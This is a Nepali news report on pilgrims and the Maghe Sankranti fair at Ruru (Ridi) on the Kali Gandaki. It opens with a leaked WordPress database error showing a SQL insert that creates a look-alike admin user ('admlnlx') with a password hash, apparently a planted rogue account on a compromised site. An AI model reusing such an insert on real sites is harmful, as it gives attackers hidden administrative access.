WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bcs56LvVChmFzG2SbayB1VyYIGu8rs/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 06:40:13', '', 'admlnlx', 'admlnlx')
श्यामशंकर पाण्डे,
गुल्मी,माघ १-
चार धाम मध्ये एक धामका रुपमा परिचित तथा गुल्मी, पाल्पा र स्याङजा जिल्लाको संगम स्थल रुरु (रिडी) क्षेत्रमा शनिबार बिहानै देखी दर्शनार्थीको घुईंचो लागेको छ ।
पश्चिम नेपालको ऐतिहासिक तथा धार्मिक क्षेत्र रुरुमा खासगरी कालीगण्डकीमा माघे संक्रान्तिको अवसरमा स्नान गर्ने तथा यस क्षेत्रमा रहेका विभिन्न मठ मन्दिरमा पूजाआजा गर्नका लागि श्रद्धालुहरुको आउने गर्दछन् । रुरु क्षेत्रमा ऋषिकेश, रुरु कन्या र भृगतुङ्गेश्वरको दर्शनका लागि प्रख्यात छन् । यी मन्दिरहरुमा आजदेखी पाँच दिनसम्म विशेष पूजा तथा मेला लाग्ने गर्दछ ।
रुरु क्षेत्र आचार्य पिठका पिठाधिस प्रधान जगतगुरु देवेश्वर सरस्वतीका अनुसार १८ पुराण मध्येको एक ‘बराह पुराण’मा उल्लेख भए अनुसार रुरु क्षेत्रको धार्मिक महत्व ५ हजार वर्ष पुरानो रहेको हो । माघे सक्रान्तिको अवसरमा गण्डकीमा स्नान गर्ने र यहाँ रहेका विभिन्न धार्मिक मठ मन्दिरमा पूजाआजा गरेमा जीवनमा गरेका सम्पूर्ण पाप नष्ट भएर जाने तथा मोक्ष प्राप्त हुने जनविश्वास रहेको छ । माघे संक्रान्तिको अवशरमा काली गण्डकीमा स्नान गर्न र ऋिषीकेशव मन्दिरको दर्शन गर्नका लागि गुल्मी लगायत पाल्पा, स्याङजा, अर्घाखाँची, प्युठान, वाग्लुङ्ग, रुपन्देही, नवलपरासी दाङ्ग, कपिलबस्तु चितवन, काठमाडांै, पर्वत लगायत जिल्ला तथा छिमेकी मुलुक भारतबाट समेत श्रद्धालुहरु यस क्षेत्रमा आउने गरेको रुरु क्षेत्र मेला ब्यबस्थापन समितिका अध्यक्ष रामलाल बिकले जानकारी दिए ।
यसदिन नदीमा स्नान गरेर रुरु कन्याको दर्शन गरेमा अन्जानका गरेका सम्पूर्ण पापवाट मोक्ष प्राप्त हुने किंवदन्ती छ । जेठी संक्रान्ति, माहिली र कान्छी संक्रान्ति गरि तीन दिनसम्म लाग्ने रिडी मेला भर्नका लागि टाढा–टाढाका मानिसहरु शुक्रवार नै रिडीमा आएका थिए । यो पटक पनि विगतको भन्दा नदीमा स्नानगर्न आउने श्रद्धालुहरुको उपस्थिति निकै वाक्लो छ ।
यता धार्मिकसँगै रिडीमा सास्कृतिक तथा ब्यापारिक महोत्सव पनि सुरु भएको छ । हातैले तयार पारेका पाखी, वासवाट निर्मित सामग्री र ओखरका घाँजी, काठका सामग्री, ऊनीजन्य सामग्री ,रिडीको माघी मेलामा मेला हेर्न आउनेका लागि थप आकर्षणका वस्तुमा पर्छन्् ।
त्यस्तै मेलाको अवसरमा रुरु क्षेत्रमा कृषि प्रर्दशनी पनि सुरु भएको छ ।